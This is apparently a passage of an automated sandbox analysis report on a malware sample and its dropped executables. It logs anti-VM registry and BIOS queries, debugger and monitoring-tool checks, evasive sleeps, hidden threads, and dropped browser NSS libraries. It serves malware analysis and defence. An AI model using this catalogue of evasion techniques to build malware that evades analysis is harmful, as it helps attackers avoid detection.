Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Memory allocated: 5040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Memory allocated: 52C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Memory allocated: 51E0000 memory reserve \| memory write watch	Jump to behavior

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Code function: 4_2_050400EB rdtsc

4_2_050400EB

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 7614			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 892			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7532	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7520	Thread sleep count: 78 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7520	Thread sleep time: -156078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7508	Thread sleep count: 71 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7508	Thread sleep time: -142071s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7616	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7512	Thread sleep count: 79 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7512	Thread sleep time: -158079s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7504	Thread sleep count: 73 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7504	Thread sleep time: -146073s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 7172	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 3320	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 1596	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 3844	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe TID: 2256	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4456	Thread sleep count: 69 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4456	Thread sleep time: -138069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3688	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3688	Thread sleep time: -136068s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776	Thread sleep count: 92 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5776	Thread sleep time: -184092s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep count: 7614 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep time: -15235614s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1196	Thread sleep count: 188 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1196	Thread sleep time: -5640000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428	Thread sleep count: 85 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3428	Thread sleep time: -170085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476	Thread sleep count: 78 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4476	Thread sleep time: -156078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5772	Thread sleep count: 88 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5772	Thread sleep time: -176088s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4916	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep count: 892 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5300	Thread sleep time: -1784892s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe TID: 1852	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 7988	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 3396	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 2792	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 5336	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe TID: 8184	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7240	Thread sleep count: 121 > 30
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7240	Thread sleep count: 131 > 30
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe TID: 7816	Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe TID: 7816	Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe TID: 7692	Thread sleep count: 63 > 30

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C61EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

6_2_6C61EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447658579.000000000032A000.00000040.00000001.01000000.0000000B.sdmp, e192e43b61.exe, 0000000A.00000002.3019575810.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, e192e43b61.exe, 0000000B.00000002.3017600863.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000000C.00000002.2750429124.0000000000F83000.00000040.00000001.01000000.00000011.sdmp, e192e43b61.exe, 0000000D.00000002.3019869572.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000001A.00000002.2902863863.0000000000F83000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000003.2077918179.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\\
Source: e192e43b61.exe, 0000000B.00000002.3029538393.0000000001398000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.0000000001933000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.000000000142A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW ,F
Source: file.exe, file.exe, 00000000.00000003.1786901695.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2899300146.000000000113C000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000002.3032979304.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883910847.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: e192e43b61.exe, 0000000D.00000002.3031046367.000000000105B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883910847.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3030925786.0000000001403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMY
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareHI
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareFlc
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000002.2119527104.000000000112F000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, 00000005.00000002.2145483793.000000000067F000.00000040.00000001.01000000.00000008.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2581096431.0000000000C03000.00000040.00000001.01000000.00000009.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447658579.000000000032A000.00000040.00000001.01000000.0000000B.sdmp, e192e43b61.exe, 0000000A.00000002.3019575810.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, e192e43b61.exe, 0000000B.00000002.3017600863.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000000C.00000002.2750429124.0000000000F83000.00000040.00000001.01000000.00000011.sdmp, e192e43b61.exe, 0000000D.00000002.3019869572.0000000000B7E000.00000040.00000001.01000000.00000010.sdmp, b0b9f39429.exe, 0000001A.00000002.2902863863.0000000000F83000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe, 00000004.00000003.2040272983.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P,
Source: e192e43b61.exe, 0000000A.00000003.2899300146.000000000113C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWa

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Code function: 4_2_050400EB rdtsc

4_2_050400EB

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Code function: 6_2_6C6EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_6C6EAC62

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

